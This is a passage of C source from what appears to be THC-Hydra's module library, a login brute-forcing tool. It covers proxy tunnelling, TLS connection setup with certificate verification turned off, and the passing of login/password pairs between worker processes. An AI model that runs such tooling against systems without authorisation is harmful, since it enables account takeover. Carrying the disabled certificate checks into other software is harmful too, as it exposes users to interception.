/* we wont quit here, thats up to the module to decide what to do\n * fprintf(stderr, \"Process %d: Can not connect\n * [unreachable], process exiting\\n\", (int32_t)getpid());\n * hydra_child_exit(1);\n */\n extern_socket = -1;\n close(s);\n ret = -1;\n if (reset_selected)\n selected_proxy = -1;\n return ret;\n }\n ret = s;\n extern_socket = s;\n if (debug)\n printf(\"DEBUG_CONNECT_OK\\n\");\n\n err = 0;\n if (use_proxy == 2) {\n if ((buf = malloc(4096)) == NULL) {\n fprintf(stderr, \"[ERROR] could not malloc()\\n\");\n close(s);\n if (reset_selected)\n selected_proxy = -1;\n return -1;\n }\n memset(&target, 0, sizeof(target));\n if (host[0] == 4) {\n memcpy(&target.sin_addr.s_addr, &host[1], 4);\n target.sin_family = AF_INET;\n target.sin_port = htons(port);\n }\n#ifdef AF_INET6\n memset(&target6, 0, sizeof(target6));\n if (host[0] == 16) {\n memcpy(&target6.sin6_addr, &host[1], 16);\n target6.sin6_family = AF_INET6;\n target6.sin6_port = htons(port);\n }\n#endif\n\n if (hydra_strcasestr(proxy_string_type[selected_proxy], \"connect\") || hydra_strcasestr(proxy_string_type[selected_proxy], \"http\")) {\n if (proxy_authentication[selected_proxy] == NULL)\n if (host[0] == 16)\n snprintf(buf, 4096, \"CONNECT [%s]:%d HTTP/1.0\\r\\n\\r\\n\", hydra_address2string(host), port);\n else\n snprintf(buf, 4096, \"CONNECT %s:%d HTTP/1.0\\r\\n\\r\\n\", hydra_address2string(host), port);\n else if (host[0] == 16)\n snprintf(buf, 4096,\n \"CONNECT [%s]:%d HTTP/1.0\\r\\nProxy-Authorization: Basic \"\n \"%s\\r\\n\\r\\n\",\n hydra_address2string(host), port, proxy_authentication[selected_proxy]);\n else\n snprintf(buf, 4096, \"CONNECT %s:%d HTTP/1.0\\r\\nProxy-Authorization: Basic %s\\r\\n\\r\\n\", hydra_address2string(host), port, proxy_authentication[selected_proxy]);\n\n send(s, buf, strlen(buf), 0);\n if (debug) {\n char *ptr = strchr(buf, '\\r');\n if (ptr != NULL)\n *ptr = 0;\n printf(\"DEBUG_CONNECT_PROXY_SENT: %s\\n\", buf);\n }\n recv(s, buf, 4096, 0);\n if (strncmp(\"HTTP/\", buf, 5) == 0 && (tmpptr = strchr(buf, ' ')) != NULL && *++tmpptr == '2') {\n if (debug)\n printf(\"DEBUG_CONNECT_PROXY_OK\\n\");\n } else {\n if (debug && tmpptr)\n printf(\"DEBUG_CONNECT_PROXY_FAILED (Code: %c%c%c)\\n\", *tmpptr, *(tmpptr + 1), *(tmpptr + 2));\n if (verbose && tmpptr)\n fprintf(stderr, \"[ERROR] CONNECT call to proxy failed with code %c%c%c\\n\", *tmpptr, *(tmpptr + 1), *(tmpptr + 2));\n err = 1;\n }\n // free(buf);\n } else {\n if (hydra_strcasestr(proxy_string_type[selected_proxy], \"socks5\")) {\n // char buf[1024];\n size_t cnt, wlen;\n\n /* socks v5 support */\n buf[0] = SOCKS_V5;\n buf[1] = 1;\n if (proxy_authentication[selected_proxy] == NULL)\n buf[2] = SOCKS_NOAUTH;\n else\n buf[2] = SOCKS_PASSAUTH;\n cnt = hydra_send(s, buf, 3, 0);\n if (cnt != 3) {\n hydra_report(stderr, \"[ERROR] SOCKS5 proxy write failed (%zu/3)\\n\", cnt);\n err = 1;\n } else {\n cnt = hydra_recv(s, buf, 2);\n if (cnt != 2) {\n hydra_report(stderr, \"[ERROR] SOCKS5 proxy read failed (%zu/2)\\n\", cnt);\n err = 1;\n }\n if ((unsigned char)buf[1] == SOCKS_NOMETHOD) {\n hydra_report(stderr, \"[ERROR] SOCKS5 proxy authentication method \"\n \"negotiation failed\\n\");\n err = 1;\n }\n /* SOCKS_DOMAIN not supported here, do we need it ? */\n if (err != 1) {\n /* send user/pass */\n if (proxy_authentication[selected_proxy] != NULL) {\n // format was checked previously\n char *login = strtok(proxy_authentication[selected_proxy], \":\");\n char *pass = strtok(NULL, \":\");\n\n snprintf(buf, 4096, \"\\x01%c%s%c%s\", (char)strlen(login), login, (char)strlen(pass), pass);\n\n cnt = hydra_send(s, buf, strlen(buf), 0);\n if (cnt != strlen(buf)) {\n hydra_report(stderr, \"[ERROR] SOCKS5 proxy write failed (%zu/3)\\n\", cnt);\n err = 1;\n } else {\n cnt = hydra_recv(s, buf, 2);\n if (cnt != 2) {\n hydra_report(stderr, \"[ERROR] SOCKS5 proxy read failed (%zu/2)\\n\", cnt);\n err = 1;\n }\n if (buf[1] != 0) {\n hydra_report(stderr, \"[ERROR] SOCKS5 proxy authentication failure\\n\");\n err = 1;\n } else {\n if (debug)\n hydra_report(stderr, \"[DEBUG] SOCKS5 proxy authentication success\\n\");\n }\n }\n }\n#ifdef AF_INET6\n if (ipv6) {\n /* Version 5, connect: IPv6 address */\n buf[0] = SOCKS_V5;\n buf[1] = SOCKS_CONNECT;\n buf[2] = 0;\n buf[3] = SOCKS_IPV6;\n memcpy(buf + 4, &target6.sin6_addr, sizeof target6.sin6_addr);\n memcpy(buf + 20, &target6.sin6_port, sizeof target6.sin6_port);\n wlen = 22;\n } else {\n#endif\n /* Version 5, connect: IPv4 address */\n buf[0] = SOCKS_V5;\n buf[1] = SOCKS_CONNECT;\n buf[2] = 0;\n buf[3] = SOCKS_IPV4;\n memcpy(buf + 4, &target.sin_addr, sizeof target.sin_addr);\n memcpy(buf + 8, &target.sin_port, sizeof target.sin_port);\n wlen = 10;\n#ifdef AF_INET6\n }\n#endif\n cnt = hydra_send(s, buf, wlen, 0);\n if (cnt != wlen) {\n hydra_report(stderr, \"[ERROR] SOCKS5 proxy write failed (%zu/%zu)\\n\", cnt, wlen);\n err = 1;\n } else {\n cnt = hydra_recv(s, buf, 10);\n if (cnt != 10) {\n hydra_report(stderr, \"[ERROR] SOCKS5 proxy read failed (%zu/10)\\n\", cnt);\n err = 1;\n }\n if (buf[1] != 0) {\n /* 0x05 = connection refused by destination host */\n if (buf[1] == 5)\n hydra_report(stderr, \"[ERROR] SOCKS proxy request failed\\n\");\n else\n hydra_report(stderr, \"[ERROR] SOCKS error %d\\n\", buf[1]);\n err = 1;\n }\n }\n }\n }\n } else {\n if (hydra_strcasestr(proxy_string_type[selected_proxy], \"socks4\")) {\n if (ipv6) {\n hydra_report(stderr, \"[ERROR] SOCKS4 proxy does not support IPv6\\n\");\n err = 1;\n } else {\n // char buf[1024];\n size_t cnt, wlen;\n\n /* socks v4 support */\n buf[0] = SOCKS_V4;\n buf[1] = SOCKS_CONNECT; /* connect */\n memcpy(buf + 2, &target.sin_port, sizeof target.sin_port);\n memcpy(buf + 4, &target.sin_addr, sizeof target.sin_addr);\n buf[8] = 0; /* empty username */\n wlen = 9;\n cnt = hydra_send(s, buf, wlen, 0);\n if (cnt != wlen) {\n hydra_report(stderr, \"[ERROR] SOCKS4 proxy write failed (%zu/%zu)\\n\", cnt, wlen);\n err = 1;\n } else {\n cnt = hydra_recv(s, buf, 8);\n if (cnt != 8) {\n hydra_report(stderr, \"[ERROR] SOCKS4 proxy read failed (%zu/8)\\n\", cnt);\n err = 1;\n }\n if (buf[1] != 90) {\n /* 91 = 0x5b = request rejected or failed */\n if (buf[1] == 91)\n hydra_report(stderr, \"[ERROR] SOCKS proxy request failed\\n\");\n else\n hydra_report(stderr, \"[ERROR] SOCKS error %d\\n\", buf[1]);\n err = 1;\n }\n }\n }\n } else {\n hydra_report(stderr,\n \"[ERROR] Unknown proxy type: %s, valid type are \"\n \"\\\"connect\\\", \\\"socks4\\\" or \\\"socks5\\\"\\n\",\n proxy_string_type[selected_proxy]);\n err = 1;\n }\n }\n }\n free(buf);\n }\n if (err) {\n close(s);\n extern_socket = -1;\n if (reset_selected)\n selected_proxy = -1;\n ret = -1;\n return ret;\n }\n fail = 0;\n if (reset_selected)\n selected_proxy = -1;\n return ret;\n }\n if (reset_selected)\n selected_proxy = -1;\n return ret;\n}\n\n#if defined(LIBOPENSSL) && !defined(LIBRESSL_VERSION_NUMBER)\nRSA *ssl_temp_rsa_cb(SSL *ssl, int32_t export, int32_t keylength) {\n int32_t nok = 0;\n#if !defined(LIBRESSL_VERSION_NUMBER) && OPENSSL_VERSION_NUMBER >= 0x10100000L\n BIGNUM *n;\n if ((n = BN_new()) == NULL)\n nok = 1;\n RSA_get0_key(rsa, (const struct bignum_st **)&n, NULL, NULL);\n BN_zero(n);\n#else\n if (rsa->n == 0)\n nok = 1;\n#endif\n if (nok == 0 && RSA_size(rsa) != (keylength / 8)) { // n is not zero\n#if !defined(LIBRESSL_VERSION_NUMBER) && OPENSSL_VERSION_NUMBER >= 0x10100000L\n BN_free(n);\n#endif\n RSA_free(rsa);\n rsa = NULL;\n }\n if (nok != 0) { // n is zero\n#if defined(NO_RSA_LEGACY) || OPENSSL_VERSION_NUMBER >= 0x10100000L\n RSA *rsa = RSA_new();\n BIGNUM *f4 = BN_new();\n BN_set_word(f4, RSA_F4);\n RSA_generate_key_ex(rsa, keylength, f4, NULL);\n#else\n rsa = RSA_generate_key(keylength, RSA_F4, NULL, NULL);\n#endif\n }\n#if !defined(LIBRESSL_VERSION_NUMBER) && OPENSSL_VERSION_NUMBER >= 0x10100000L\n BN_free(n);\n#endif\n return rsa;\n}\n#endif\n\n#if defined(LIBOPENSSL)\nint32_t internal__hydra_connect_to_ssl(int32_t socket, char *hostname) {\n int32_t err;\n\n if (ssl_first) {\n SSL_load_error_strings();\n // SSL_add_ssl_algoritms();\n SSL_library_init(); // ?\n ssl_first = 0;\n }\n\n if (sslContext == NULL) {\n /* context: ssl2 + ssl3 is allowed, whatever the server demands */\n if (old_ssl) {\n if ((sslContext = SSL_CTX_new(SSLv23_client_method())) == NULL) {\n if (verbose) {\n err = ERR_get_error();\n fprintf(stderr, \"[ERROR] SSL allocating context: %s\\n\", ERR_error_string(err, NULL));\n }\n return -1;\n }\n } else {\n#ifndef TLSv1_2_client_method\n#if OPENSSL_VERSION_NUMBER < 0x10100000L\n#define TLSv1_2_client_method TLSv1_2_client_method\n#else\n#define TLSv1_2_client_method TLS_client_method\n#endif\n#endif\n if ((sslContext = SSL_CTX_new(TLSv1_2_client_method())) == NULL) {\n if (verbose) {\n err = ERR_get_error();\n fprintf(stderr, \"[ERROR] SSL allocating context: %s\\n\", ERR_error_string(err, NULL));\n }\n return -1;\n }\n }\n /* set the compatbility mode */\n SSL_CTX_set_options(sslContext, SSL_OP_ALL);\n // SSL_CTX_set_options(sslContext, SSL_OP_NO_SSLv2);\n // SSL_CTX_set_options(sslContext, SSL_OP_NO_TLSv1);\n\n /* we set the default verifiers and don't care for the results */\n (void)SSL_CTX_set_default_verify_paths(sslContext);\n#if OPENSSL_VERSION_NUMBER < 0x10100000L\n SSL_CTX_set_tmp_rsa_callback(sslContext, ssl_temp_rsa_cb);\n#endif\n SSL_CTX_set_verify(sslContext, SSL_VERIFY_NONE, NULL);\n }\n\n if ((ssl = SSL_new(sslContext)) == NULL) {\n if (verbose) {\n err = ERR_get_error();\n fprintf(stderr, \"[ERROR] preparing an SSL context: %s\\n\", ERR_error_string(err, NULL));\n }\n SSL_set_bio(ssl, NULL, NULL);\n SSL_clear(ssl);\n return -1;\n }\n\n /* add SNI */\n SSL_set_tlsext_host_name(ssl, hostname);\n\n SSL_set_fd(ssl, socket);\n\n if (SSL_connect(ssl) <= 0) {\n // fprintf(stderr, \"[ERROR] SSL Connect %d\\n\", SSL_connect(ssl));\n if (verbose) {\n err = ERR_get_error();\n fprintf(stderr, \"[VERBOSE] Could not create an SSL session: %s\\n\", ERR_error_string(err, NULL));\n }\n close(socket);\n return -1;\n }\n if (debug)\n fprintf(stderr, \"[VERBOSE] SSL negotiated cipher: %s\\n\", SSL_get_cipher(ssl));\n\n use_ssl = 1;\n\n return socket;\n}\n\nint32_t internal__hydra_connect_ssl(char *host, int32_t port, int32_t type, int32_t protocol, char *hostname) {\n int32_t socket;\n\n if ((socket = internal__hydra_connect(host, port, type, protocol)) < 0)\n return -1;\n\n return internal__hydra_connect_to_ssl(socket, hostname);\n}\n#endif\n\nint32_t internal__hydra_recv(int32_t socket, char *buf, uint32_t length) {\n#ifdef LIBOPENSSL\n if (use_ssl) {\n return SSL_read(ssl, buf, length);\n } else\n#endif\n return recv(socket, buf, length, 0);\n}\n\nint32_t internal__hydra_send(int32_t socket, char *buf, uint32_t size, int32_t options) {\n#ifdef LIBOPENSSL\n if (use_ssl) {\n return SSL_write(ssl, buf, size);\n } else\n#endif\n return send(socket, buf, size, options);\n}\n\n/* ------------------ public functions ------------------ */\n\nvoid hydra_child_exit(int32_t code) {\n char buf[2];\n\n if (debug)\n printf(\"[DEBUG] pid %d called child_exit with code %d\\n\", getpid(), code);\n if (code == 0) /* normal quitting */\n __fck = write(intern_socket, \"Q\", 1);\n else if (code == 1) /* no connect possible */\n __fck = write(intern_socket, \"C\", 1);\n else if (code == 2) /* application protocol error or service shutdown */\n __fck = write(intern_socket, \"E\", 1);\n else if (code == 3) /* application protocol error or service shutdown */\n __fck = write(intern_socket, \"D\", 1);\n // code 4 means exit without telling mommy about it - a bad idea. mommy should\n // know\n else if (code == -1 || code > 4) {\n fprintf(stderr, \"[TOTAL FUCKUP] a module should not use \"\n \"hydra_child_exit(-1) ! Fix it in the source please ...\\n\");\n __fck = write(intern_socket, \"E\", 1);\n }\n do {\n usleepn(10);\n } while (read(intern_socket, buf, 1) <= 0);\n close(intern_socket);\n // sleep(2); // be sure that mommy receives our message\n exit(0); // might be killed before reaching this\n}\n\nvoid hydra_register_socket(int32_t s) { intern_socket = s; }\n\nchar *hydra_get_next_pair() {\n if (pair[0] == 0) {\n pair[sizeof(pair) - 1] = 0;\n __fck = read(intern_socket, pair, sizeof(pair) - 1);\n // if (debug) hydra_dump_data(pair, __fck, \"CHILD READ PAIR\");\n if (pair[0] == 0 || __fck <= 0)\n return HYDRA_EMPTY;\n if (__fck >= sizeof(HYDRA_EXIT) && memcmp(&HYDRA_EXIT, &pair, sizeof(HYDRA_EXIT)) == 0)\n return HYDRA_EXIT;\n }\n return pair;\n}\n\nchar *hydra_get_next_login() {\n if (pair[0] == 0)\n return HYDRA_EMPTY;\n return pair;\n}\n\nchar *hydra_get_next_password() {\n char *ptr = pair;\n\n while (*ptr != '\\0')\n ptr++;\n ptr++;\n if (*ptr == 0)\n return HYDRA_EMPTY;\n return ptr;\n}\n\nvoid hydra_completed_pair() {\n __fck = write(intern_socket, \"N\", 1);\n pair[0] = 0;\n}\n\nvoid hydra_completed_pair_found() {\n char *login;\n\n __fck = write(intern_socket, \"F\", 1);\n login = hydra_get_next_login();\n __fck = write(intern_socket, login, strlen(login) + 1);\n pair[0] = 0;\n}\n\nvoid hydra_completed_pair_skip() {\n char *login;\n\n __fck = write(intern_socket, \"f\", 1);\n login = hydra_get_next_login();\n __fck = write(intern_socket, login, strlen(login) + 1);\n pair[0] = 0;\n}\n\n/*\nbased on writeError from Medusa project\n*/\nvoid hydra_report_debug(FILE *st, char *format, ...) {\n va_list ap;\n char buf[8200];\n char bufOut[33000];\n char temp[6];\n unsigned char cTemp;\n int32_t i = 0, len;\n\n if (format == NULL) {\n fprintf(stderr, \"[ERROR] no msg passed.\\n\");\n } else {\n va_start(ap, format);\n memset(bufOut, 0, sizeof(bufOut));\n memset(buf, 0, sizeof(buf));\n len = vsnprintf(buf, sizeof(buf), format, ap);\n\n // Convert any chars less than 32d or greater than 126d to hex\n for (i = 0; i < len; i++) {\n memset(temp, 0, 6);\n cTemp = (unsigned char)buf[i];\n if (cTemp < 32 || cTemp > 126) {\n sprintf(temp, \"[%02X]\", cTemp);\n } else\n sprintf(temp, \"%c\", cTemp);\n\n if (strlen(bufOut) + 6 < sizeof(bufOut))\n strncat(bufOut, temp, 6);\n else\n break;\n }\n fprintf(st, \"%s\\n\", bufOut);\n va_end(ap);\n }\n return;\n}\n\nvoid hydra_report_found(int32_t port, char *svc, FILE *fp) {\n /*\n if (!strcmp(svc, \"rsh\"))\n if (colored_output)\n fprintf(fp, \"[\\e[31m%d\\e[0m][\\e[31m%s\\e[0m] login: \\e[32m%s\\e[0m\\n\",\n port, svc, hydra_get_next_login()); else fprintf(fp, \"[%d][%s] login: %s\\n\",\n port, svc, hydra_get_next_login()); else if (colored_output) fprintf(fp,\n \"[\\e[31m%d\\e[0m][\\e[31m%s\\e[0m] login: \\e[32m%s\\e[0m password:\n \\e[32m%s\\e[0m\\n\", port, svc, hydra_get_next_login(),\n hydra_get_next_password()); else fprintf(fp, \"[%d][%s] login: %s password:\n %s\\n\", port, svc, hydra_get_next_login(), hydra_get_next_password());\n\n if (stdout != fp) {\n if (!strcmp(svc, \"rsh\"))\n printf(\"[%d][%s] login: %s\\n\", port, svc, hydra_get_next_login());\n else\n printf(\"[%d][%s] login: %s password: %s\\n\", port, svc,\n hydra_get_next_login(), hydra_get_next_password());\n }\n\n fflush(fp);\n */\n}\n\n/* needed for irc module to display the general server password */\nvoid hydra_report_pass_found(int32_t port, char *ip, char *svc, FILE *fp) {\n /*\n strcpy(ipaddr_str, hydra_address2string(ip));\n if (colored_output)\n fprintf(fp, \"[\\e[31m%d\\e[0m][\\e[31m%s\\e[0m] host: \\e[32m%s\\e[0m password:\n \\e[32m%s\\e[0m\\n\", port, svc, ipaddr_str, hydra_get_next_password()); else\n fprintf(fp, \"[%d][%s] host: %s password: %s\\n\", port, svc, ipaddr_str,\n hydra_get_next_password()); if (stdout != fp) printf(\"[%d][%s] host: %s\n password: %s\\n\", port, svc, ipaddr_str, hydra_get_next_password());\n fflush(fp);\n */\n}\n\nvoid hydra_report_found_host(int32_t port, char *ip, char *svc, FILE *fp) {\n /* char *keyw = \"password\";\n\n strcpy(ipaddr_str, hydra_address2string(ip));\n if (!strcmp(svc, \"smtp-enum\"))\n keyw = \"domain\";\n if (!strcmp(svc, \"rsh\") || !strcmp(svc, \"oracle-sid\"))\n if (colored_output)\n fprintf(fp, \"[\\e[31m%d\\e[0m][\\e[31m%s\\e[0m] host: \\e[32m%s\\e[0m login:\n \\e[32m%s\\e[0m\\n\", port, svc, ipaddr_str, hydra_get_next_login()); else\n fprintf(fp, \"[%d][%s] host: %s login: %s\\n\", port, svc, ipaddr_str,\n hydra_get_next_login()); else if (!strcmp(svc, \"snmp3\")) if (colored_output)\n fprintf(fp, \"[\\e[31m%d\\e[0m][\\e[31m%s\\e[0m] host: \\e[32m%s\\e[0m login:\n \\e[32m%s\\e[0m\\n\", port, svc, ipaddr_str, hydra_get_next_password()); else\n fprintf(fp, \"[%d][%s] host: %s login: %s\\n\", port, svc, ipaddr_str,\n hydra_get_next_password()); else if (!strcmp(svc, \"cisco-enable\") ||\n !strcmp(svc, \"cisco\")) if (colored_output) fprintf(fp,\n \"[\\e[31m%d\\e[0m][\\e[31m%s\\e[0m] host: \\e[32m%s\\e[0m password:\n \\e[32m%s\\e[0m\\n\", port, svc, ipaddr_str, hydra_get_next_password()); else\n fprintf(fp, \"[%d][%s] host: %s password: %s\\n\", port, svc, ipaddr_str,\n hydra_get_next_password()); else if (colored_output) fprintf(fp,\n \"[\\e[31m%d\\e[0m][\\e[31m%s\\e[0m] host: \\e[32m%s\\e[0m login: \\e[32m%s\\e[0m\n %s: \\e[32m%s\\e[0m\\n\", port, svc, ipaddr_str, hydra_get_next_login(), keyw,\n hydra_get_next_password());\n else\n fprintf(fp, \"[%d][%s] host: %s login: %s %s: %s\\n\", port, svc,\n ipaddr_str, hydra_get_next_login(), keyw, hydra_get_next_password()); if\n (stdout != fp) { if (!strcmp(svc, \"rsh\") || !strcmp(svc, \"oracle-sid\"))\n printf(\"[%d][%s] host: %s login: %s\\n\", port, svc, ipaddr_str,\n hydra_get_next_login()); else if (!strcmp(svc, \"snmp3\")) printf(\"[%d][%s]\n host: %s login: %s\\n\", port, svc, ipaddr_str, hydra_get_next_password());\n else if (!strcmp(svc, \"cisco-enable\") || !strcmp(svc, \"cisco\"))\n printf(\"[%d][%s] host: %s password: %s\\n\", port, svc, ipaddr_str,\n hydra_get_next_password()); else printf(\"[%d][%s] host: %s login: %s %s:\n %s\\n\", port, svc, ipaddr_str, hydra_get_next_login(), keyw,\n hydra_get_next_password());\n }\n fflush(fp);\n fflush(stdout);\n */\n}\n\nvoid hydra_report_found_host_msg(int32_t port, char *ip, char *svc, FILE *fp, char *msg) {\n /*\n strcpy(ipaddr_str, hydra_address2string(ip));\n if (colored_output)\n fprintf(fp, \"[\\e[31m%d\\e[0m][\\e[31m%s\\e[0m] host: \\e[32m%s\\e[0m login:\n \\e[32m%s\\e[0m password: \\e[32m%s\\e[0m [%s]\\n\", port, svc, ipaddr_str,\n hydra_get_next_login(), hydra_get_next_password(), msg); else fprintf(fp,\n \"[%d][%s] host: %s login: %s password: %s [%s]\\n\", port, svc,\n ipaddr_str, hydra_get_next_login(), hydra_get_next_password(), msg); if\n (stdout != fp) printf(\"[%d][%s] host: %s login: %s password: %s\\n\",\n port, svc, ipaddr_str, hydra_get_next_login(), hydra_get_next_password());\n fflush(fp);\n */\n}\n\nint32_t hydra_connect_to_ssl(int32_t socket, char *hostname) {\n#ifdef LIBOPENSSL\n return (internal__hydra_connect_to_ssl(socket, hostname));\n#else\n fprintf(stderr, \"Error: not compiled with SSL\\n\");\n return -1;\n#endif\n}\n\nint32_t hydra_connect_ssl(char *host, int32_t port, char *hostname) {\n if (__first_connect != 0)\n __first_connect = 0;\n else\n sleep(conwait);\n#ifdef LIBOPENSSL\n return (internal__hydra_connect_ssl(host, port, SOCK_STREAM, 6, hostname));\n#else\n fprintf(stderr, \"Error: not compiled with SSL\\n\");\n return -1;\n#endif\n}\n\nint32_t hydra_connect_tcp(char *host, int32_t port) {\n if (__first_connect != 0)\n __first_connect = 0;\n else\n sleep(conwait);\n return (internal__hydra_connect(host, port, SOCK_STREAM, 6));\n}\n\nint32_t hydra_connect_udp(char *host, int32_t port) {\n if (__first_connect != 0)\n __first_connect = 0;\n else\n sleep(conwait);\n return (internal__hydra_connect(host, port, SOCK_DGRAM, 17));\n}\n\nint32_t hydra_disconnect(int32_t socket) {\n#ifdef LIBOPENSSL\n if (use_ssl && SSL_get_fd(ssl) == socket) {\n /* SSL_shutdown(ssl); ...skip this--it slows things down */\n SSL_set_bio(ssl, NULL, NULL);\n SSL_clear(ssl);\n use_ssl = 0;\n }\n#endif\n close(socket);\n if (debug)\n printf(\"DEBUG_DISCONNECT\\n\");\n return -1;\n}\n\nint32_t hydra_data_ready_writing_timed(int32_t socket, long sec, long usec) {\n fd_set fds;\n\n FD_ZERO(&fds);\n FD_SET(socket, &fds);\n return (my_select(socket + 1, &fds, NULL, NULL, sec, usec));\n}\n\nint32_t hydra_data_ready_writing(int32_t socket) { return (hydra_data_ready_writing_timed(socket, 30, 0)); }\n\nint32_t hydra_data_ready_timed(int32_t socket, long sec, long usec) {\n fd_set fds;\n\n FD_ZERO(&fds);\n FD_SET(socket, &fds);\n return (my_select(socket + 1, &fds, NULL, NULL, sec, usec));\n}\n\nint32_t hydra_data_ready(int32_t socket) { return (hydra_data_ready_timed(socket, 0, 100)); }\n\nint32_t hydra_recv(int32_t socket, char *buf, uint32_t length) {\n int32_t ret;\n char text[64];\n\n ret = internal__hydra_recv(socket, buf, length);\n if (debug) {\n sprintf(text, \"[DEBUG] RECV [pid:%d]\", getpid());\n hydra_dump_data(buf, ret, text);\n // hydra_report_debug(stderr, \"DEBUG_RECV_BEGIN|%s|END [pid:%d ret:%d]\",\n // buf, getpid(), ret);\n }\n return ret;\n}\n\nint32_t hydra_recv_nb(int32_t socket, char *buf, uint32_t length) {\n int32_t ret = -1;\n char text[64];\n\n if (hydra_data_ready_timed(socket, (long)waittime, 0) > 0) {\n if ((ret = internal__hydra_recv(socket, buf, length)) <= 0) {\n buf[0] = 0;\n if (debug) {\n sprintf(text, \"[DEBUG] RECV [pid:%d]\", getpid());\n hydra_dump_data(buf, ret, text);\n }\n return ret;\n }\n if (debug) {\n sprintf(text, \"[DEBUG] RECV [pid:%d]\", getpid());\n hydra_dump_data(buf, ret, text);\n // hydra_report_debug(stderr, \"DEBUG_RECV_BEGIN|%s|END [pid:%d ret:%d]\",\n // buf, getpid(), ret);\n }\n }\n return ret;\n}\n\nchar *hydra_receive_line(int32_t socket) {\n char buf[1024], *buff, *buff2, pid[64];\n int32_t i, j, k, got = 0;\n\n if ((buff = malloc(sizeof(buf))) == NULL) {\n fprintf(stderr, \"[ERROR] could not malloc\\n\");\n return NULL;\n }\n\n memset(buff, 0, sizeof(buf));\n\n if (debug)\n printf(\"[DEBUG] hydra_receive_line: waittime: %d, conwait: %d, socket: %d, \"\n \"pid: %d\\n\",\n waittime, conwait, socket, getpid());\n\n if ((i = hydra_data_ready_timed(socket, (long)waittime, 0)) > 0) {\n do {\n j = internal__hydra_recv(socket, buf, sizeof(buf) - 1);\n if (j > 0) {\n for (k = 0; k < j; k++)\n if (buf[k] == 0)\n buf[k] = 32;\n\n buf[j] = 0;\n\n if ((buff2 = realloc(buff, got + j + 1)) == NULL) {\n free(buff);\n return NULL;\n }\n\n buff = buff2;\n memcpy(buff + got, &buf, j + 1);\n got += j;\n buff[got] = 0;\n } else if (j < 0) {\n // some error occured\n got = -1;\n }\n } while (hydra_data_ready(socket) > 0 && j > 0\n#ifdef LIBOPENSSL\n || use_ssl && SSL_pending(ssl)\n#endif\n );\n\n if (got > 0) {\n if (debug) {\n sprintf(pid, \"[DEBUG] RECV [pid:%d]\", getpid());\n hydra_dump_data(buff, got, pid);\n // hydra_report_debug(stderr, \"DEBUG_RECV_BEGIN [pid:%d len:%d]|%s|END\",\n // getpid(), got, buff);\n }\n } else {\n if (got < 0) {\n if (debug) {\n sprintf(pid, \"[DEBUG] RECV [pid:%d]\", getpid());\n hydra_dump_data((unsigned char *)\"\", -1, pid);\n // hydra_report_debug(stderr, \"DEBUG_RECV_BEGIN||END [pid:%d %d]\",\n // getpid(), i);\n perror(\"recv\");\n }\n }\n free(buff);\n return NULL;\n }\n\n usleepn(100);\n } else {\n if (debug)\n printf(\"[DEBUG] hydra_data_ready_timed: %d, waittime: %d, conwait: %d, \"\n \"socket: %d\\n\",\n i, waittime, conwait, socket);\n }\n\n return buff;\n}\n\nint32_t hydra_send(int32_t socket, char *buf, uint32_t size, int32_t options) {\n char text[64];\n\n if (debug) {\n sprintf(text, \"[DEBUG] SEND [pid:%d]\", getpid());\n hydra_dump_data(buf, size, text);\n\n /* int32_t k;\n char *debugbuf = malloc(size + 1);\n\n if (debugbuf != NULL) {\n for (k = 0; k < size; k++)\n if (buf[k] == 0)\n debugbuf[k] = 32;\n else\n debugbuf[k] = buf[k];\n debugbuf[size] = 0;\n hydra_report_debug(stderr, \"DEBUG_SEND_BEGIN|%s|END [pid:%d]\",\n debugbuf, getpid()); free(debugbuf);\n }*/\n }\n\n /* if (hydra_data_ready_writing(socket)) < 1) return -1; XXX maybe needed\n * in the future */\n return (internal__hydra_send(socket, buf, size, options));\n}\n\nint32_t make_to_lower(char *buf) {\n if (buf == NULL)\n return 1;\n while (buf[0] != 0) {\n buf[0] = tolower((int32_t)buf[0]);\n buf++;\n }\n return 1;\n}\n\nchar *hydra_strrep(char *string, char *oldpiece, char *newpiece) {\n int32_t str_index, newstr_index, oldpiece_index, end, new_len, old_len, cpy_len;\n char *c, oldstring[6096],\n newstring[6096]; // updated due to issue 192 on github.\n static char finalstring[6096];\n\n if (string == NULL || oldpiece == NULL || newpiece == NULL || strlen(string) >= sizeof(oldstring) - 1 || (strlen(string) + strlen(newpiece) - strlen(oldpiece) >= sizeof(newstring) - 1 && strlen(string) > strlen(oldpiece)))\n return NULL;\n\n if (strlen(string) > 6000) {\n hydra_report(stderr, \"[ERROR] Supplied URL or POST data too large. Max \"\n \"limit is 6000 characters.\\n\");\n exit(-1);\n }\n\n strcpy(newstring, string);\n strcpy(oldstring, string);\n\n // while ((c = (char *) strstr(oldstring, oldpiece)) != NULL) {\n c = (char *)strstr(oldstring, oldpiece);\n new_len = strlen(newpiece);\n old_len = strlen(oldpiece);\n end = strlen(oldstring) - old_len;\n oldpiece_index = c - oldstring;\n newstr_index = 0;\n str_index = 0;\n while (c != NULL && str_index <= end) {\n /* Copy characters from the left of matched pattern occurence */\n cpy_len = oldpiece_index - str_index;\n strncpy(newstring + newstr_index, oldstring + str_index, cpy_len);\n newstr_index += cpy_len;\n str_index += cpy_len;\n\n /* Copy replacement characters instead of matched pattern */\n strcpy(newstring + newstr_index, newpiece);\n newstr_index += new_len;\n str_index += old_len;\n /* Check for another pattern match */\n if ((c = (char *)strstr(oldstring + str_index, oldpiece)) != NULL)\n oldpiece_index = c - oldstring;\n }\n /* Copy remaining characters from the right of last matched pattern */\n strcpy(newstring + newstr_index, oldstring + str_index);\n strcpy(oldstring, newstring);\n // }\n strcpy(finalstring, newstring);\n return finalstring;\n}\n\nunsigned char hydra_conv64(unsigned char in) {\n if (in < 26)\n return (in + 'A');\n else if (in >= 26 && in < 52)\n return (in + 'a' - 26);\n else if (in >= 52 && in < 62)\n return (in + '0' - 52);\n else if (in == 62)\n return '+';\n else if (in == 63)\n return '/';\n else {\n fprintf(stderr, \"[ERROR] too high for base64: %d\\n\", in);\n return 0;\n }\n}\n\nvoid hydra_tobase64(unsigned char *buf, uint32_t buflen, uint32_t bufsize) {\n unsigned char small[3] = {0, 0, 0};\n unsigned char big[5];\n unsigned char *ptr = buf;\n uint32_t i = bufsize;\n uint32_t len = 0;\n unsigned char bof[i];\n\n if (buf == NULL || strlen((char *)buf) == 0 || buflen == 0)\n return;\n bof[0] = 0;\n memset(big, 0, sizeof(big));\n memset(bof, 0, bufsize);\n\n for (i = 0; i < buflen / 3; i++) {\n memset(big, 0, sizeof(big));\n big[0] = hydra_conv64(*ptr >> 2);\n big[1] = hydra_conv64(((*ptr & 3) << 4) + (*(ptr + 